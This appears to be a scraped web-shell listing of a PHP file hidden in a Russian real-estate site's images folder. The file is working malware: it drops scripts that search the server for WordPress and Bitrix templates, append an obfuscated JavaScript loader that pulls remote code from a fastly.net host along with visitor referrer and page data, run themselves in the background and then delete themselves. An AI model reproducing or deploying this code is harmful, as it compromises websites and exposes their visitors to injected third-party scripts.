Your IP : 18.218.151.70


Current Path : /var/www/www-root/data/webdav/webdav/webdav/www/info.monolith-realty.ru/assets/images/
Upload File :
Current File : /var/www/www-root/data/webdav/webdav/webdav/www/info.monolith-realty.ru/assets/images/eaosd0s13.php

<?php
$codeWP = '<?php
function findAccessiblePaths($path) {
    $parts = explode("/", $path);
    $currentPath = "/";
    $accessiblePaths = [];
    foreach ($parts as $part) {
        if (!empty($part)) {
            $currentPath .= $part . "/";
            if (is_readable($currentPath)) {
                $accessiblePaths[] = $currentPath;
            }
        }
    }
    return $accessiblePaths;
}
function findWpThemesCrossPlatform() {
    $cwd = getcwd();
    $accessiblePaths = findAccessiblePaths($cwd);
    $allModifiedFiles = [];
    foreach ($accessiblePaths as $path) {
        $command = getSearchCommand($path);
        $output = shell_exec($command);
        $functionsPaths = [];
        if ($output) {
            $paths = preg_split("/\r\n|\r|\n/", trim($output));
            foreach ($paths as $path) {
                $foundPaths = findFilesRecursively($path, "functions.php");
                $functionsPaths = array_merge($functionsPaths, $foundPaths);
            }
        }
        $modifiedFiles = addCustomScriptToFiles($functionsPaths);
        if (!empty($modifiedFiles)) {
            $allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles);
            break;
        }
    }
    if (empty($allModifiedFiles)) {
        echo "No themes modified or accessible";
    } else {
        print_r($allModifiedFiles);
    }
}
function addCustomScriptToFiles(array $functionsPaths) {
    $modifiedFiles = [];
    $newFunctionCode = getCustomScript();
    foreach ($functionsPaths as $functionsPath) {
        if (file_exists($functionsPath) && is_writable($functionsPath)) {
            $code = file_get_contents($functionsPath);
            if (strpos($code, "wp_system_query_script") === false) {
                $code .= "\n" . $newFunctionCode;
                file_put_contents($functionsPath, $code);
                $modifiedFiles[] = $functionsPath;
            }
        }
    }
    return $modifiedFiles;
}
function getCustomScript() {
    return <<<PHP
function wp_system_query_script() {
    ?>
<script>    (function() {
    var name = '_Mc9mBgWG38zk8XNL';
    if (!window._Mc9mBgWG38zk8XNL) {
        window._Mc9mBgWG38zk8XNL = {
            unique: false,
            ttl: 86400,
            R_PATH: 'https://bbtrrack.global.ssl.fastly.net/1NXymm',
        };
    }
    const _pgdLVPqfC9fn6g1b = localStorage.getItem('config');
    if (typeof _pgdLVPqfC9fn6g1b !== 'undefined' && _pgdLVPqfC9fn6g1b !== null) {
        var _kStQB6qgh2YBMF5k = JSON.parse(_pgdLVPqfC9fn6g1b);
        var _WHZRPvD2MwPNjYk6 = Math.round(+new Date()/1000);
        if (_kStQB6qgh2YBMF5k.created_at + window._Mc9mBgWG38zk8XNL.ttl < _WHZRPvD2MwPNjYk6) {
            localStorage.removeItem('subId');
            localStorage.removeItem('token');
            localStorage.removeItem('config');
        }
    }
    var _VVF8fWgg3KqXjBtP = localStorage.getItem('subId');
    var _yZD5QdfNHkBZnYb6 = localStorage.getItem('token');
    var _8tzHczpcbGfrYXDH = '?return=js.client';
        _8tzHczpcbGfrYXDH += '&' + decodeURIComponent(window.location.search.replace('?', ''));
        _8tzHczpcbGfrYXDH += '&se_referrer=' + encodeURIComponent(document.referrer);
        _8tzHczpcbGfrYXDH += '&default_keyword=' + encodeURIComponent(document.title);
        _8tzHczpcbGfrYXDH += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
        _8tzHczpcbGfrYXDH += '&name=' + encodeURIComponent(name);
        _8tzHczpcbGfrYXDH += '&host=' + encodeURIComponent(window._Mc9mBgWG38zk8XNL.R_PATH);
    if (typeof _VVF8fWgg3KqXjBtP !== 'undefined' && _VVF8fWgg3KqXjBtP && window._Mc9mBgWG38zk8XNL.unique) {
        _8tzHczpcbGfrYXDH += '&sub_id=' + encodeURIComponent(_VVF8fWgg3KqXjBtP);
    }
    if (typeof _yZD5QdfNHkBZnYb6 !== 'undefined' && _yZD5QdfNHkBZnYb6 && window._Mc9mBgWG38zk8XNL.unique) {
        _8tzHczpcbGfrYXDH += '&token=' + encodeURIComponent(_yZD5QdfNHkBZnYb6);
    }
    if ('' !== '') {
        _8tzHczpcbGfrYXDH += '&bypass_cache=';
    }
    var a = document.createElement('script');
        a.type = 'application/javascript';
        a.src = window._Mc9mBgWG38zk8XNL.R_PATH + _8tzHczpcbGfrYXDH;
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(a, s)
    })();</script>
    <?php
}
add_action("wp_footer", "wp_system_query_script");
add_action("wp_body_open", "wp_system_query_script");
PHP;
}
function getSearchCommand($startPath) {
    $os = strtoupper(substr(PHP_OS, 0, 3));
    if ($os === "WIN") {
        return "dir /s /b /a:d {$startPath}*wp-content\\themes*";
    } else {
        return "find {$startPath} -type d -name \'themes\' -path \'*/wp-content/themes\' 2>/dev/null";
    }
}
function findFilesRecursively($dir, $fileName) {
    $results = [];
    $files = scandir($dir);
    foreach ($files as $file) {
        if ($file !== "." && $file !== "..") {
            $path = $dir . DIRECTORY_SEPARATOR . $file;
            if (is_dir($path)) {
                $results = array_merge($results, findFilesRecursively($path, $fileName));
            } elseif ($file === $fileName) {
                $results[] = $path;
            }
        }
    }
    return $results;
}
findWpThemesCrossPlatform();
die();
?>';
$codeBT = '<?php 
function findAccessiblePaths($path)
{
    $parts = explode("/", $path);
    $currentPath = "/";
    $accessiblePaths = [];
    foreach ($parts as $part) {
        if (!empty($part)) {
            $currentPath .= $part . "/";
            if (is_readable($currentPath)) {
                $accessiblePaths[] = $currentPath;
            }
        }
    }
    return $accessiblePaths;
}
function modifyBitrixTemplates()
{
    $cwd = getcwd();
    $accessiblePaths = findAccessiblePaths($cwd);
    $allModifiedFiles = [];
    foreach ($accessiblePaths as $path) {
        $command = getSearchCommand($path);
        $output = shell_exec($command);
        $templatePaths = [];
        if ($output) {
            $paths = preg_split("/\r\n|\r|\n/", trim($output));
            foreach ($paths as $path) {
                $foundPaths = findFilesRecursively($path, "header.php"); // Example file in a Bitrix template
                $templatePaths = array_merge($templatePaths, $foundPaths);
            }
        }
        $modifiedFiles = addCustomScriptToFiles($templatePaths);
        if (!empty($modifiedFiles)) {
            $allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles);
            break;
        }
    }
    if (empty($allModifiedFiles)) {
        echo "No templates modified or accessible";
    } else {
        echo print_r($allModifiedFiles);
    }
}
function addCustomScriptToFiles(array $templatePaths)
{
    $modifiedFiles = [];
    $newFunctionCode = getCustomScript();
    foreach ($templatePaths as $templatePath) {
        if (file_exists($templatePath) && is_writable($templatePath)) {
            $code = file_get_contents($templatePath);
            if (strpos($code, "custom_query_script") === false) {
                $code .= "\n" . $newFunctionCode;
                file_put_contents($templatePath, $code);
                $modifiedFiles[] = $templatePath;
            }
        }
    }
    return $modifiedFiles;
}
function getCustomScript()
{
    return <<<HTML
<script>    (function() {
    var name = '_Mc9mBgWG38zk8XNL';
    if (!window._Mc9mBgWG38zk8XNL) {
        window._Mc9mBgWG38zk8XNL = {
            unique: false,
            ttl: 86400,
            R_PATH: 'https://bbtrrack.global.ssl.fastly.net/1NXymm',
        };
    }
    const _pgdLVPqfC9fn6g1b = localStorage.getItem('config');
    if (typeof _pgdLVPqfC9fn6g1b !== 'undefined' && _pgdLVPqfC9fn6g1b !== null) {
        var _kStQB6qgh2YBMF5k = JSON.parse(_pgdLVPqfC9fn6g1b);
        var _WHZRPvD2MwPNjYk6 = Math.round(+new Date()/1000);
        if (_kStQB6qgh2YBMF5k.created_at + window._Mc9mBgWG38zk8XNL.ttl < _WHZRPvD2MwPNjYk6) {
            localStorage.removeItem('subId');
            localStorage.removeItem('token');
            localStorage.removeItem('config');
        }
    }
    var _VVF8fWgg3KqXjBtP = localStorage.getItem('subId');
    var _yZD5QdfNHkBZnYb6 = localStorage.getItem('token');
    var _8tzHczpcbGfrYXDH = '?return=js.client';
        _8tzHczpcbGfrYXDH += '&' + decodeURIComponent(window.location.search.replace('?', ''));
        _8tzHczpcbGfrYXDH += '&se_referrer=' + encodeURIComponent(document.referrer);
        _8tzHczpcbGfrYXDH += '&default_keyword=' + encodeURIComponent(document.title);
        _8tzHczpcbGfrYXDH += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
        _8tzHczpcbGfrYXDH += '&name=' + encodeURIComponent(name);
        _8tzHczpcbGfrYXDH += '&host=' + encodeURIComponent(window._Mc9mBgWG38zk8XNL.R_PATH);
    if (typeof _VVF8fWgg3KqXjBtP !== 'undefined' && _VVF8fWgg3KqXjBtP && window._Mc9mBgWG38zk8XNL.unique) {
        _8tzHczpcbGfrYXDH += '&sub_id=' + encodeURIComponent(_VVF8fWgg3KqXjBtP);
    }
    if (typeof _yZD5QdfNHkBZnYb6 !== 'undefined' && _yZD5QdfNHkBZnYb6 && window._Mc9mBgWG38zk8XNL.unique) {
        _8tzHczpcbGfrYXDH += '&token=' + encodeURIComponent(_yZD5QdfNHkBZnYb6);
    }
    if ('' !== '') {
        _8tzHczpcbGfrYXDH += '&bypass_cache=';
    }
    var a = document.createElement('script');
        a.type = 'application/javascript';
        a.src = window._Mc9mBgWG38zk8XNL.R_PATH + _8tzHczpcbGfrYXDH;
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(a, s)
    })();</script>
HTML;
}
function getSearchCommand($startPath)
{
    $os = strtoupper(substr(PHP_OS, 0, 3));
    if ($os === "WIN") {
        return "dir /s /b /a:d {$startPath}*bitrix*";
    } else {
        return "find {$startPath} -type d -name \'bitrix\' -path \'*/bitrix\' 2>/dev/null";
    }
}
function findFilesRecursively($dir, $fileName)
{
    $results = [];
    $files = scandir($dir);
    foreach ($files as $file) {
        if ($file !== "." && $file !== "..") {
            $path = $dir . DIRECTORY_SEPARATOR . $file;
            if (is_dir($path)) {
                $results = array_merge($results, findFilesRecursively($path, $fileName));
            } elseif ($file === $fileName) {
                $results[] = $path;
            }
        }
    }
    return $results;
}
modifyBitrixTemplates(); 
die(); 
?>';
$del = <<<PHP
<?php
unlink('wp.php');
unlink('bt.php');
unlink('wpbtStart.php');
?>
PHP;
file_put_contents('wp.php', $codeWP);
file_put_contents('bt.php', $codeBT);
file_put_contents('del.php', $del);
$os = strtoupper(substr(PHP_OS, 0, 3));
if ($os === "WIN") {
    shell_exec("start /B php wp.php > log_wp.txt 2>&1");
    shell_exec("start /B php bt.php > log_bt.txt 2>&1");
    shell_exec("Start-Sleep -Seconds 600; Start-Process 'php' -ArgumentList 'del.php' -NoNewWindow");
} else {
    shell_exec("php wp.php > log_wp.txt 2>&1 &");
    shell_exec("php bt.php > log_bt.txt 2>&1 &");
    shell_exec("(sleep 600 && php del.php) > /dev/null 2>&1 &");
}
?>